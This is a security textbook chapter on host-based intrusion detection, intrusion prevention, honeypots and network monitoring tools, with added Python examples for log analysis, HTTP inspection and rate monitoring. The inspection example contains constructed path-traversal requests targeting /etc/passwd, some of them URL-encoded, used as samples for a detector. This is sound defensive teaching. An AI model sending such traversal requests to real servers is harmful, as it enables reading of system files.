The signature database is a collection of predefined activity patterns that have already been identified and categorized—patterns that typically indicate suspicious or malicious activity. When the analysis engine has an activity or traffic pattern to examine, it compares that pattern to the appropriate signatures in the database. The signature database can contain anywhere from a few to a few thousand signatures, depending on the vendor, type of HIDS, space available on the system to store signatures, and other factors.
The user interface is the visible component of the HIDS—the part that humans interact with. The user interface varies widely depending on the product and vendor and could be anything from a detailed GUI to a simple command line. Regardless of the type and complexity, the interface is provided to allow the user to interact with the system: changing parameters, receiving alarms, tuning signatures and response patterns, and so on.
Tech Tip: Decision Trees
In computer systems, a tree is a data structure, each element of which is attached to one or more structures directly beneath it (the connections are called branches). Structures on the end of a branch without any elements below them are called leaves. Trees are most often drawn inverted, with the root at the top and all subsequent elements branching down from the root. Trees in which each element has no more than two elements below it are called binary trees. In IDSs, a decision tree is used to help the analysis engine quickly examine traffic patterns and eliminate signatures that don't apply to the particular traffic or activity being examined, so that the fewest possible comparisons need to be made. For example, as shown in this illustration, the decision tree may contain a section that divides the activity into one of three subsections based upon the origin of the activity (a log entry for an event taken from the system logs, a file change for a modification to a critical file, or a user action for something a user has done):
When the analysis engine looks at the activity pattern and starts down the decision tree, it must decide which path to follow. If it is a log entry, the analysis engine can then concentrate on only the signatures that apply to log entries and it does not need to worry about signatures that apply to file changes or user actions. This type of decision tree allows the analysis engine to function much faster, as it does not have to compare activities to every signature in the database, just the signatures that apply to that particular type of activity. It is important to note that HIDSs can look at both activities occurring on the host itself and the network traffic coming into or leaving the host.
To better understand how a HIDS operates, take a look at the following examples from a UNIX system and a Windows system.
On a UNIX system, the HIDS is likely going to examine any of a number of system logs—basically, large text files containing entries about what is happening on the system. For this example, consider the following lines from the "messages" log on a Red Hat system:
In the first line beginning Jan 5, you see a session being opened by a user named bob. This usually indicates that whoever owns the account bob has logged into the system. On the next three lines beginning Jan 5, you see authentication failures as bob tries to become root—the superuser account that can do anything on the system. In this case, user bob tries three times to become root and fails on each try. This pattern of activity could mean a number of different things—bob could be an admin who has forgotten the password for the root account, bob could be an admin and someone changed the root password without telling him, bob could be a user attempting to guess the root password, or an attacker could have compromised bob's account and is now trying to compromise the root account on the system. In any case, our HIDS will work through its decision tree to determine whether an authentication failure in the message log is something it needs to examine. In this instance, when the HIDS examines these lines in the log, it will note the fact that three of the lines in the log match one of the patterns it has been told to look for (as determined by information from the decision tree and the signature database), and it will react accordingly, usually by generating an alarm or alert of some type that appears on the user interface or in an e-mail, page, or other form of message.
Tech Tip: Analyst-Driven Log Analysis
Log analysis is the art of translating computer-generated logs into meaningful data. For example, a computer can't always tell you if an administrator-level login at 3 A.M. on a Saturday is definitely a bad thing, but an analyst can. Human analysts can add value through the interpretation of information in context with other sources of information.
On a Windows system, the HIDS will likely examine the logs generated by the operating system. The three basic types of logs (Application, System, and Security) are similar to the logs on a UNIX system, though the Windows logs are not stored as text files and typically require a utility or application to read them. This example uses the Security log from a Windows Vista system:
In the first three main lines of the Security log, you see an Audit Failure entry for the Logon process. This indicates someone has tried to log into the system three times and has failed each time (much like our UNIX example) and then succeeded on the fourth try. You won't see the name of the account until you expand the log entry within the Windows Event Viewer tool, but for this example, assume it was the administrator account—the Windows equivalent of the root account. Here again, you see three login failures—if the HIDS has been programmed to look for failed login attempts, it will generate alerts when it examines these log entries.
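The UNIX and Windows walk-throughs above, and the decision-tree tip before them, are served by one added example (not the book's own listing, whose log lines are not reproduced here): a traffic collector for each log source turns raw entries into events tagged with their origin, and the analysis engine consults only the signature group for that origin, alarming on the third failed attempt by the same subject. The syslog lines are constructed in the style of a Red Hat "messages" log, and the Windows records are constructed tuples; event ID 4625 is a failed logon and 4624 a successful one on Vista and later.

```python
"""Added example: a small HIDS analysis engine for su failures in a UNIX
'messages' log and logon failures in the Windows Security log, dispatched
through a decision tree keyed on event origin. All log data is constructed."""
import re
from collections import defaultdict

# Constructed syslog lines in the style of a Red Hat 'messages' log.
MESSAGES_LOG = """\
Jan  5 08:41:07 host1 su(pam_unix)[2231]: session opened for user bob by (uid=0)
Jan  5 08:41:20 host1 su(pam_unix)[2260]: authentication failure; logname=bob uid=500 euid=0 tty=pts/0 ruser=bob rhost=  user=root
Jan  5 08:41:29 host1 su(pam_unix)[2261]: authentication failure; logname=bob uid=500 euid=0 tty=pts/0 ruser=bob rhost=  user=root
Jan  5 08:41:44 host1 su(pam_unix)[2262]: authentication failure; logname=bob uid=500 euid=0 tty=pts/0 ruser=bob rhost=  user=root
Jan  5 09:02:11 host1 sshd[2310]: Accepted publickey for alice from 10.0.0.7 port 51022 ssh2
"""

# Constructed Windows Security log records: (event id, keyword, account).
SECURITY_LOG = [
    (4625, "Audit Failure", "Administrator"),
    (4625, "Audit Failure", "Administrator"),
    (4625, "Audit Failure", "Administrator"),
    (4624, "Audit Success", "Administrator"),
]

SU_FAILURE = re.compile(
    r"su\(pam_unix\)\[\d+\]: authentication failure; .*?ruser=(?P<who>\S+) .*?user=(?P<target>\S+)")


def collect_syslog(text):
    """Traffic collector, UNIX side: one ('log', who, target) event per su failure."""
    events = []
    for line in text.splitlines():
        m = SU_FAILURE.search(line)
        if m:
            events.append(("log", m.group("who"), m.group("target")))
    return events


def collect_windows(records):
    """Traffic collector, Windows side: one ('winlog', account, 'logon') event per 4625."""
    return [("winlog", account, "logon") for eid, _, account in records if eid == 4625]


# The decision tree's first split: signatures grouped by the origin of the event,
# so an entry from the messages log is never compared with file-change signatures.
SIGNATURES = {
    "log":    [("su-failures", 3)],        # alarm on the 3rd failed su by one user
    "winlog": [("logon-failures", 3)],     # alarm on the 3rd failed logon for one account
    "file":   [],                          # file-change signatures would live here
}


def analysis_engine(events):
    """Count (signature, subject, target) occurrences; emit an alarm when a threshold is hit."""
    counts = defaultdict(int)
    alarms = []
    for origin, subject, target in events:
        for name, threshold in SIGNATURES.get(origin, []):
            key = (name, subject, target)
            counts[key] += 1
            if counts[key] == threshold:
                alarms.append(f"{name}: {subject} -> {target} ({threshold} attempts)")
    return alarms


def run():
    return analysis_engine(collect_syslog(MESSAGES_LOG) + collect_windows(SECURITY_LOG))


if __name__ == "__main__":
    for alarm in run():
        print(alarm)
```

The engine cannot tell which of the four explanations the text offers for bob's failures is true; like the IDS in the false-positive discussion, it only reports that the pattern occurred and leaves intent to the analyst.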
Advantages of HIDSs
HIDSs have certain advantages that make them a good choice for certain situations:
They can be very operating system–specific and have more detailed signatures. A HIDS can be very specifically designed to run on a certain operating system or to protect certain applications. This narrow focus lets developers concentrate on the specific things that affect the specific environment they are trying to protect. With this type of focus, the developers can avoid generic alarms and develop much more specific, detailed signatures to identify malicious traffic more accurately.
They can reduce false-positive rates. When running on a specific system, the HIDS process is much more likely to be able to determine whether or not the activity being examined is malicious. By more accurately identifying which activity is "bad," the HIDS will generate fewer false positives (alarms generated when the traffic matches a pattern but is not actually malicious).
They can examine data after it has been decrypted. With security concerns constantly on the rise, many developers are starting to encrypt their network communications. When designed and implemented in the right manner, a HIDS will be able to examine traffic that is unreadable to a network-based IDS. This particular ability is becoming more important each day as more and more websites start to encrypt all of their traffic.
They can be very application specific. On a host level, the IDS can be designed, modified, or tuned to work very well on specific applications without having to analyze or even hold signatures for other applications that are not running on that particular system. Signatures can be built for specific versions of web server software, FTP servers, mail servers, or any other application housed on that host.
They can determine whether or not an alarm may impact that specific system. The ability to determine whether or not a particular activity or pattern will really affect the system being protected assists greatly in reducing the number of generated alarms. Because the HIDS resides on the system, it can verify things such as patch levels, presence of certain files, and system state when it analyzes traffic. By knowing what state the system is in, the HIDS can more accurately determine whether an activity is potentially harmful to the system.
Disadvantages of HIDSs
HIDSs also have certain disadvantages that must be weighed in making the decision of whether to deploy this type of technology:
The HIDS must have a process on every system you want to watch. You must have a HIDS process or application installed on every host you want to watch. To watch 100 systems, then, you would need to deploy 100 HIDSs, or remote agents.
The HIDS can have a high cost of ownership and maintenance. Depending on the specific vendor and application, a HIDS can be fairly costly in terms of time and manpower to maintain. Unless some type of central console is used that allows you to maintain remote processes, administrators must maintain each HIDS process individually. Even with a central console, with a HIDS, there will be a high number of processes to maintain, software to update, and parameters to tune.
The HIDS uses local system resources. To function, the HIDS must use CPU cycles and memory from the system it is trying to protect. Whatever resources the HIDS uses are no longer available for the system to perform its other functions. This becomes extremely important on applications such as high-volume web servers, where fewer resources usually means fewer visitors served and the need for more systems to handle expected traffic.
The HIDS has a very focused view and cannot relate to activity around it. The HIDS has a limited view of the world, as it can see activity only on the host it is protecting. It has little to no visibility into traffic around it on the network or events taking place on other hosts. Consequently, a HIDS can tell you only if the system it is running on is under attack.
The HIDS, if logging only locally, could be compromised or disabled. When a HIDS generates alarms, it typically stores the alarm information in a file or database of some sort. If the HIDS stores its generated alarm traffic on the local system, an attacker that is successful in breaking into the system may be able to modify or delete those alarms. This makes it difficult for security personnel to discover the intruder and conduct any type of post-incident investigation. A capable intruder may even be able to turn off the HIDS process completely.
A security best practice is to store or make a copy of log information, especially security-related log information, on a separate system. When a system is compromised, the attacker typically hides their tracks by clearing out any log files on the compromised system. If the log files are only stored locally on the compromised system, you'll know an attacker was present (due to the empty log files) but you won't know what they did or when they did it.
Active vs. Passive HIDSs
Most IDSs can be distinguished by how they examine the activity around them and whether or not they interact with that activity. This is certainly true for HIDSs. On a passive system, the HIDS is exactly that—it simply watches the activity, analyzes it, and generates alarms. It does not interact with the activity itself in any way, and it does not modify the defensive posture of the system to react to the traffic. A passive HIDS is similar to a simple motion sensor—it generates an alarm when it matches a pattern, much as the motion sensor generates an alarm when it sees movement. An active IDS will contain all the same components and capabilities of the passive IDS with one critical exception—the active IDS can react to the activity it is analyzing. These reactions can range from something simple, such as running a script to turn a process on or off, to something as complex as modifying file permissions, terminating the offending processes, logging off specific users, and reconfiguring local capabilities to prevent specific users from logging in for the next 12 hours.
Resurgence and Advancement of HIDSs
The past few years have seen a strong resurgence in the use of HIDSs. With the great advances in processor power, the introduction of multicore processors, and the increased capacity of hard drives and memory systems, some of the traditional barriers to running a HIDS have been overcome. Combine those advances in technology with the widespread adoption of always-on broadband connections, the rise in the use of telecommuting, and a greater overall awareness of the need for computer security, and solutions such as HIDSs start to become an attractive and sometimes effective solution for business and home users alike.
The latest generation of HIDSs has introduced new capabilities designed to stop attacks by preventing them from ever executing or accessing protected files in the first place, rather than relying on a specific signature set that only matches known attacks. The more advanced host-based offerings, which most vendors refer to as host-based intrusion prevention systems (HIPSs), combine the following elements into a single package:
Integrated system firewall The firewall component checks all network traffic passing into and out of the host. Users can set rules for what types of traffic they want to allow into or out of their system.
Behavioral- and signature-based IDS This hybrid approach uses signatures to match well-known attacks and generic patterns for catching "zero-day" or unknown attacks for which no signatures exist.
Application control This allows administrators to control how applications are used on the system and whether or not new applications can be installed. Controlling the addition, deletion, or modification of existing software can be a good way to control a system's baseline and prevent malware from being installed.
Enterprise management Some host-based products are installed with an "agent" that allows them to be managed by and report back to a central server. This type of integrated remote management capability is essential in any large-scale deployment of host-based IDS/IPS.
Malware detection and prevention Some HIDSs/HIPSs include scanning and prevention capabilities that address spyware, malware, rootkits, and other malicious software.
Integrated security products can provide a great deal of security-related features in a single package. This is often cheaper and more convenient than purchasing a separate antivirus product, a firewall, and an IDS. However, integrated products are not without potential pitfalls—if one portion of the integrated product fails, the entire protective suite may fail. Symantec's Endpoint Protection and McAfee's Internet Security are examples of integrated, host-based protection products.
Intrusion Prevention Systems
An intrusion prevention system (IPS) monitors network traffic for malicious or unwanted behavior and can block, reject, or redirect that traffic in real time. Sound familiar? It should: while many vendors will argue that an IPS is a different animal from an IDS, the truth is that most IPSs are merely expansions of existing IDS capabilities. As a core function, an IPS must be able to monitor for and detect potentially malicious network traffic, which is essentially the same function as an IDS. However, an IPS does not stop at merely monitoring traffic—it must be able to block, reject, or redirect that traffic in real time to be considered a true IPS. It must be able to stop or prevent malicious traffic from having an impact. To qualify as an IDS, a system just needs to see and classify the traffic as malicious. To qualify as an IPS, a system must be able to do something about that traffic. In reality, most products that are called IDSs, including the first commercially available IDS, NetRanger, can interact with and stop malicious traffic, so the distinction between the two is often blurred.
The term intrusion prevention system was originally coined by Andrew Plato in marketing literature developed for NetworkICE, a company that was purchased by ISS and which is now part of IBM. The term IPS has effectively taken the place of the term "active IDS."
Like IDSs, most IPSs have an internal signature database to compare network traffic against known "bad" traffic patterns. IPSs can perform content-based inspections, looking inside network packets for unique packets, data values, or patterns that match known malicious patterns. Some IPSs can perform protocol inspection, in which the IPS decodes traffic and analyzes it as it would appear to the server receiving it. For example, many IPSs can do HTTP protocol inspection, so they can examine incoming and outgoing HTTP traffic and process it as an HTTP server would. The advantage here is that the IPS can detect and defeat popular evasion techniques such as encoding URLs because the IPS "sees" the traffic in the same way the web server would when it receives and decodes it. The IPS can also detect activity that is abnormal or potentially malicious for that protocol, such as passing an extremely large value (over 10,000 characters) to a login field on a web page.
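An added example of the protocol inspection just described (not any IPS vendor's code): the same content signature is applied once to the raw request bytes and once after the request has been percent-decoded the way the receiving web server would decode it, and the decoded form is also checked for the over-long login field the text mentions. The requests, the `/etc/passwd` signature and the 10,000-character limit are constructed for the example; the number of decoding passes is an assumption that should mirror what the protected server actually does.

```python
"""Added example: HTTP protocol inspection versus raw content matching.
Requests are constructed; the decode depth should mirror the protected server."""
from urllib.parse import parse_qs, unquote, urlsplit

MAX_FIELD_LEN = 10_000        # the text's example: a login value over 10,000 characters is abnormal
SIGNATURE = "/etc/passwd"

# Constructed requests: (method, raw request-target, body)
REQUESTS = [
    ("GET", "/download?file=../../etc/passwd", ""),
    ("GET", "/download?file=..%2F..%2Fetc%2Fpasswd", ""),          # percent-encoded form
    ("GET", "/download?file=..%252F..%252Fetc%252Fpasswd", ""),    # double-encoded form
    ("POST", "/login", "user=" + "A" * 12000 + "&pass=x"),          # oversize login field
    ("GET", "/index.html", ""),
]


def raw_match(request):
    """Content-only check on the bytes as they appear on the wire."""
    _, target, body = request
    return SIGNATURE in target or SIGNATURE in body


def normalize(text, rounds=2):
    """Decode percent-encoding as the server would. `rounds` is an assumption:
    it should equal the number of times the protected server decodes."""
    for _ in range(rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def inspect(request):
    """Protocol inspection: normalise first, then apply the content signature and
    the field-length check. Returns the list of findings (empty when clean)."""
    method, target, body = request
    findings = []
    norm_target, norm_body = normalize(target), normalize(body)
    if SIGNATURE in norm_target or SIGNATURE in norm_body:
        findings.append("content:/etc/passwd")
    fields = parse_qs(urlsplit(norm_target).query)
    if method == "POST":
        fields.update(parse_qs(norm_body))
    for name, values in fields.items():
        if any(len(v) > MAX_FIELD_LEN for v in values):
            findings.append(f"oversize-field:{name}")
    return findings


def compare_all(requests=REQUESTS):
    """Side by side: (raw match result, protocol-inspection findings) per request."""
    return [(raw_match(r), inspect(r)) for r in requests]


if __name__ == "__main__":
    for request, (raw, deep) in zip(REQUESTS, compare_all()):
        print(f"{request[0]} {request[1][:40]:40} raw={raw!s:5} inspection={deep}")
```

Only the first request trips the raw check; the decoded variants and the oversize field are visible solely to the inspection path, which is why the text stresses seeing the traffic "as the web server would".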
ExamTip:AnIDSislikeaburglaralarm—itwatchesandalertsyouwhensomethingbadhappens.AnIPSislikeanarmedsecurityguard—itwatches,stopsthebadactivity,andthenletsyouknowwhathappened.
Unlike a traditional IDS, an IPS must sit inline (in the flow of traffic) to be able to interact effectively with the network traffic. Most IPSs can operate in “stealth mode” and do not require an IP address for the connections they are monitoring. When an IPS detects malicious traffic, it can drop the offending packets, reset incoming or established connections, generate alerts, quarantine traffic to/from specific IP addresses, or even block traffic from offending IP addresses on a temporary or permanent basis. As they are sitting inline, most IPSs can also offer rate-based monitoring to detect and mitigate denial-of-service attacks. With rate-based monitoring, the IPS can watch the amount of traffic traversing the network. If the IPS sees too much traffic coming into or going out from a specific system or set of systems, the IPS can intervene and throttle down the traffic to a lower and more acceptable level. Many IPSs perform this function by “learning” what are “normal” network traffic patterns with regard to number of connections per second, amount of packets per connection, packets coming from or going to specific ports, and so on, and comparing current traffic rates for network traffic (TCP, UDP, ARP, ICMP, and so on) to those established norms. When a traffic pattern reaches a threshold or varies dramatically from those norms, the IPS can react and intervene as needed.
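The learn-then-compare cycle just described, as an added example that is not code from the book: a monitor learns a per-protocol "normal" connections-per-second rate from a training period, then reports any source whose rate in a later window exceeds that norm (the traffic, hosts and thresholds are all constructed for the demo).

```python
"""Rate-based monitoring of the kind an inline IPS performs: learn what a
"normal" connections-per-second rate looks like per protocol during a
training period, then flag sources whose rate exceeds that learned norm.
Added example (not code from the book); the traffic below is constructed."""
import math
from collections import Counter, defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ConnEvent:
    ts: float    # seconds since capture start
    src: str     # source IP address
    proto: str   # "TCP", "UDP", "ICMP", ...


def counts_per_window(events, window):
    """Count events per (src, proto) in fixed windows of `window` seconds."""
    counts = Counter()
    for ev in events:
        counts[(ev.src, ev.proto, int(ev.ts // window))] += 1
    return counts


class RateMonitor:
    """Learns per-protocol thresholds (mean + k*stddev of per-source,
    per-window counts) and reports sources that exceed them."""

    def __init__(self, window=1.0, sigmas=3.0, floor=5):
        self.window = window
        self.sigmas = sigmas
        self.floor = floor          # never alarm below this absolute count
        self.thresholds = {}        # proto -> learned threshold

    def learn(self, training_events):
        """Establish norms from a period the operator believes is benign."""
        samples = defaultdict(list)
        for (_, proto, _), n in counts_per_window(training_events, self.window).items():
            samples[proto].append(n)
        for proto, xs in samples.items():
            mean = sum(xs) / len(xs)
            stddev = math.sqrt(sum((x - mean) ** 2 for x in xs) / len(xs))
            self.thresholds[proto] = max(self.floor, mean + self.sigmas * stddev)
        return self.thresholds

    def check(self, live_events):
        """Return {(src, proto): (verdict, observed, threshold)} for every
        source/protocol pair that exceeded its norm in some window. An IPS
        would throttle or block these; here we only report the worst window."""
        verdicts = {}
        for (src, proto, _), n in counts_per_window(live_events, self.window).items():
            threshold = self.thresholds.get(proto, self.floor)
            if n > threshold:
                prev = verdicts.get((src, proto))
                if prev is None or n > prev[1]:
                    verdicts[(src, proto)] = ("throttle", n, threshold)
        return verdicts


def constructed_training():
    """Constructed baseline: three hosts each opening 2-4 TCP connections
    per second for a minute."""
    events = []
    for second in range(60):
        for i, src in enumerate(("10.0.0.2", "10.0.0.3", "10.0.0.4")):
            for k in range(2 + (second + i) % 3):
                events.append(ConnEvent(second + k * 0.1, src, "TCP"))
    return events


def constructed_live():
    """Constructed live traffic: a normal host behaves as before, while
    10.0.0.7 opens 40 TCP connections within one second (a flood in miniature)."""
    events = [ConnEvent(100 + k * 0.1, "10.0.0.2", "TCP") for k in range(4)]
    events += [ConnEvent(100 + k * 0.01, "10.0.0.7", "TCP") for k in range(40)]
    return events


def detect_floods():
    """Run the full cycle on the constructed data and return the verdicts."""
    monitor = RateMonitor(window=1.0, sigmas=3.0, floor=5)
    monitor.learn(constructed_training())
    return monitor.check(constructed_live())


if __name__ == "__main__":
    for (src, proto), (verdict, n, thr) in sorted(detect_floods().items()):
        print(f"{src} {proto}: {verdict} ({n} conn/s, learned norm {thr:.1f})")
```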
Tech Tip
Inline Network Devices
An “inline” network device is something that is positioned in the flow of traffic—network traffic must pass through it going into or out of the network. Any inline device has the potential to stop network traffic if that device fails. To allow network traffic to flow, many network devices will fail “open,” meaning they simply pass traffic from one interface to another without inspecting it or interacting with it. Some administrators choose to have their firewalls and IPSs fail “closed,” meaning that if the devices are not functioning correctly, all traffic is stopped until those devices can be repaired.
Like a traditional IDS, the IPS has a potential weakness when dealing with encrypted traffic. Traffic that is encrypted will typically pass by the IPS untouched (provided it does not trigger any non-content–related alarms such as rate-based alarms). To counter this problem, some IPS vendors are including the ability to decrypt Secure Sockets Layer (SSL) sessions for further inspection. To do this, some IPS solutions store copies of any protected web servers’ private keys on the sensor itself. When the IPS sees a session initiation request, it monitors the initial transactions between the server and the client. By using the server’s stored private keys, the IPS will be able to determine the session keys negotiated during the SSL session initiation. With the session keys, the IPS can decrypt all future packets passed between server and client during that web session. This gives the IPS the ability to perform content inspection on SSL-encrypted traffic.
The term wire speed refers to the theoretical maximum transmission rate of a cable or other medium and is based on a number of factors, including the properties of the cable itself and the connection protocol in use (in other words, how much data can be pushed through under ideal conditions).
You will often see IPSs (and IDSs) advertised and marketed by the amount of traffic they can process without dropping packets or interrupting the flow of network traffic. In reality, a network will never reach its hypothetical maximum transmission rate, or wire speed, due to errors, collisions, retransmissions, and other factors; therefore, a 1-Gbps network is not actually capable of passing 1 Gbps of network traffic, even if all the components are rated to handle 1 Gbps. When used in a marketing sense, wire speed is the maximum throughput rate the networking or security device equipment can process without impacting that network traffic. For example, a 1-Gbps IPS should be able to process, analyze, and protect 1 Gbps of network traffic without impacting traffic flow. IPS vendors often quote their products’ capacity as the combined throughput possible through all available ports on the IPS sensor—a 10-Gbps sensor may have 12 Gigabit Ethernet ports but is capable of handling only 10 Gbps of network traffic.
Tech Tip
Detection Controls vs. Prevention Controls
When securing your organization, especially your network perimeter and critical systems, you will likely have to make some choices as to what type of protective measures and controls you need to implement. For example, you may need to decide between detection controls (capabilities that detect and alert on suspicious or malicious activity) and prevention controls (capabilities that stop suspicious or malicious activity). Consider the differences between a traditional IDS and IPS. Although many IDSs have some type of response capability, their real purpose is to watch for activity and then alert when “hostile” activity is noted. On the other hand, an IPS is designed to block, thwart, and prevent that same “hostile” activity. A parallel example in the physical security space would be a camera and a security guard. A camera watches activity and can even generate alerts when motion is detected. But a camera cannot stop an intruder from breaking into a facility and stealing something—it only records and alerts. A security guard, however, has the ability to stop the intruder physically, either before they break into the facility or before they can leave with the stolen goods.
Honeypots and Honeynets
As is often the case, one of the best tools for information security personnel has always been knowledge. To secure and defend a network and the information systems on that network properly, security personnel need to know what they are up against. What types of attacks are being used? What tools and techniques are popular at the moment? How effective is a certain technique? What sort of impact will this tool have on my network? Often this sort of information is passed through white papers, conferences, mailing lists, or even word of mouth. In some cases, the tool developers themselves provide much of the information in the interest of promoting better security for everyone. Information is also gathered through examination and forensic analysis, often after a major incident has already occurred and information systems are already damaged. One of the most effective techniques for collecting this type of information is to observe activity firsthand—watching an attacker as he probes, navigates, and exploits his way through a network. To accomplish this without exposing critical information systems, security researchers often use something called a honeypot. A honeypot, sometimes called a digital sandbox, is an artificial environment where attackers can be contained and observed without putting real systems at risk. A good honeypot appears to an attacker to be a real network consisting of application servers, user systems, network traffic, and so on, but in most cases it’s actually made up of one or a few systems running specialized software to simulate the user and network traffic common to most targeted networks. Figure 13.9 illustrates a simple honeypot layout in which a single system is placed on the network to deliberately attract attention from potential attackers.
• Figure 13.9 Logical depiction of a honeypot
Figure 13.9 shows the security researcher’s view of the honeypot, while Figure 13.10 shows the attacker’s view. The security administrator knows that the honeypot, in this case, actually consists of a single system running software designed to react to probes, reconnaissance attempts, and exploits as if it were an entire network of systems. When the attacker connects to the honeypot, she is presented with an entire “virtual” network of servers and PCs running a variety of applications. In most cases, the honeypot will appear to be running versions of applications that are known to be vulnerable to specific exploits. All this is designed to provide the attacker with an enticing, hopefully irresistible, target.
• Figure 13.10 Virtual network created by the honeypot
Any time an attacker has been lured into probing or attacking the virtual network, the honeypot records the activity for later analysis: what the attacker does, which systems and applications she concentrates on, what tools are run, how long the attacker stays, and so on. All this information is collected and analyzed in the hopes that it will allow security personnel to better understand and protect against the threats to their systems. There are many honeypots in use, specializing in everything from wireless to denial-of-service attacks; most are run by research, government, or law enforcement organizations. Why aren’t more businesses running honeypots? Quite simply, the time and cost are prohibitive. Honeypots take a lot of time and effort to manage and maintain, and even more effort to sort, analyze, and classify the traffic the honeypot collects. Unless they are developing security tools, most companies focus their limited security efforts on preventing attacks, and in many cases, companies aren’t even that concerned with detecting attacks as long as the attacks are blocked, are unsuccessful, and don’t affect business operations. Even though honeypots can serve as a valuable resource by luring attackers away from production systems and allowing defenders to identify and thwart potential attackers before they cause any serious damage, the costs and efforts involved deter many companies from using honeypots.
A honeynet is a collection of two or more honeypots. Larger, very diverse network environments can deploy multiple honeypots (thus forming a honeynet) when a single honeypot device does not provide enough coverage. Honeynets are often integrated into an organization-wide IDS/IPS because the honeynet can provide relevant information about potential attackers.
Exam Tip: A honeypot is a system designed to attract potential attackers by pretending to be one or more systems with open network services.
Tools
Tools are a vital part of any security professional’s skill set. You may not be an “assessment professional” who spends most of his or her career examining networks looking for vulnerabilities, but you can use many of the same tools for internal assessment activities, tracking down infected systems, spotting inappropriate behavior, and so on. Knowing the right tool for the job can be critical to performing effectively.
Protocol Analyzer
A protocol analyzer (also known as a packet sniffer, network analyzer, or network sniffer) is a piece of software or an integrated software/hardware system that can capture and decode network traffic. Protocol analyzers have been popular with system administrators and security professionals for decades because they are such versatile and useful tools for a network environment. From a security perspective, protocol analyzers can be used for a number of activities, such as the following:
Detecting intrusions or undesirable traffic (an IDS/IPS must have some type of capture and decode ability to be able to look for suspicious/malicious traffic)
Capturing traffic during incident response or incident handling
Looking for evidence of botnets, Trojans, and infected systems
Looking for unusual traffic or traffic exceeding certain thresholds
Testing encryption between systems or applications
From a network administration perspective, protocol analyzers can be used for activities such as these:
Analyzing network problems
Detecting misconfigured applications or misbehaving applications
Gathering and reporting network usage and traffic statistics
Debugging client/server communications
Exam Tip: A sniffer must use a NIC placed in promiscuous (promisc) mode or it will not see all the network traffic coming into the NIC.
Regardless of the intended use, a protocol analyzer must be able to see network traffic in order to capture and decode it. A software-based protocol analyzer must be able to place the NIC it is going to use to monitor network traffic in promiscuous mode (sometimes called promisc mode). Promiscuous mode tells the NIC to process every network packet it sees regardless of the intended destination. Normally, a NIC processes only broadcast packets (which go to everyone on that subnet) and packets with the NIC’s Media Access Control (MAC) address as the destination address inside the packet. As a sniffer, the analyzer must process every packet crossing the wire, so the ability to place a NIC into promiscuous mode is critical. With older networking technologies, such as hubs, it was easier to operate a protocol analyzer, as the hub broadcasted every packet across every interface regardless of the destination. With switches now the standard for networking equipment, placing a protocol analyzer becomes more difficult as switches do not broadcast every packet across every port. While this may make it harder for administrators to sniff the traffic, it also makes it harder for eavesdroppers and potential attackers. To accommodate protocol analyzers, IDS devices, and IPS devices, most switch manufacturers support port mirroring or a Switched Port Analyzer (SPAN) port (discussed in the next section). Depending on the manufacturer and the hardware, a mirrored port will see all the traffic passing through the switch or through a specific VLAN(s), or all the traffic passing through other specific switch ports. The network traffic is essentially copied (or mirrored) to a specific port, which can then support a protocol analyzer.
Another option for traffic capture is to use a network tap, a hardware device that can be placed inline on a network connection and that will copy traffic passing through the tap to a second set of interfaces on the tap. Network taps are often used to sniff traffic passing between devices at the network perimeter, such as the traffic passing between a router and a firewall. Many common network taps work by bridging a network connection and passing incoming traffic out one tap port (A) and outgoing traffic out another tap port (B), as shown in Figure 13.11.
• Figure 13.11 A basic network tap
A popular, open source protocol analyzer is Wireshark (www.wireshark.org). Available for both UNIX and Windows operating systems, Wireshark is a GUI-based protocol analyzer that allows users to capture and decode network traffic on any available network interface in the system on which the software is running (including wireless interfaces), as demonstrated in Figure 13.12. Wireshark has some interesting features, including the ability to “follow the TCP stream,” which allows the user to select a single TCP packet and then see all the other packets involved in that TCP conversation.
• Figure 13.12 Wireshark—a popular, open source protocol analyzer
Switched Port Analyzer
The term Switched Port Analyzer (SPAN) is usually associated with Cisco switches—other vendors refer to the same capability as port mirroring or port monitoring. A SPAN has the ability to copy network traffic passing through one or more ports on a switch or one or more VLANs on a switch and forward that copied traffic to a port designated for traffic capture and analysis (as shown in Figure 13.13). A SPAN port or mirror port creates the collection point for traffic that will be fed into a protocol analyzer or IDS/IPS. SPAN or mirror ports can usually be configured to monitor traffic passing into interfaces, passing out of interfaces, or passing in both directions. When configuring port mirroring, you need to be aware of the capabilities of the switch you are working with. Can it handle the volume of traffic? Can it successfully mirror all the traffic, or will it end up dropping packets to the SPAN if traffic volume gets too high?
• Figure 13.13 A SPAN port collects traffic from other ports on a switch.
Port Scanner
A port scanner is a tool designed to probe a system or systems for open ports. Its job is to probe for open (or listening) ports and report back to the user which ports are closed, which are filtered, and which are open. Port scanners are available for virtually every operating system and almost every popular mobile computing platform—from tablets to smartphones. Having a good port-scanning tool in your toolset and knowing how to use it can be very beneficial. The good news/bad news about port scanners is that the “bad guys” use them for basically the same reasons the good guys use them. Port scanners can be used to do the following:
Search for “live” hosts on a network. Most port scanners enable you to perform a quick scan using ICMP, TCP, or UDP packets to search for active hosts on a given network or network segment. ICMP is still very popular for this task, but with the default blocking of ICMPv4 in many modern operating systems, such as Windows 7 and beyond, users are increasingly turning to TCP or UDP scans for these tasks.
Search for any open ports on the network. Port scanners are most often used to identify any open ports on a host, group of hosts, or network. By scanning a large number of ports over a large number of hosts, a port scanner can provide you (or an attacker) with a very good picture of what services are running on which hosts on your network. Scans can be done for the “default” set of popular ports, a large range of ports, or every possible port (from 1 to 65535).
Search for specific ports. Only looking for web servers? Mail servers? Port scanners can also be configured to just look for specific services.
Identify services on ports. Some port scanners can help identify the services running on open ports based on information returned by the service or the port/service assigned (if standards have been followed). For example, a service running on port 80 is likely to be a web server.
Look for TCP/UDP services. Most port scanners can perform scans for both TCP and UDP services, although some tools do not allow you to scan for both protocols at the same time.
As a security professional, you’ll use port scanners in much the same way an attacker would: to probe the systems in your network for open services. When you find open services, you’ll need to determine if those services should be running at all, if they should be running on the system(s) you found them on, and if you can do anything to limit what connections are allowed to those services. For example, you may want to scan your network for any system accepting connections on TCP port 1433 (Microsoft SQL Server). If you find a system accepting connections on TCP port 1433 in your Sales group, chances are someone has installed something they shouldn’t have (or someone installed something for them).
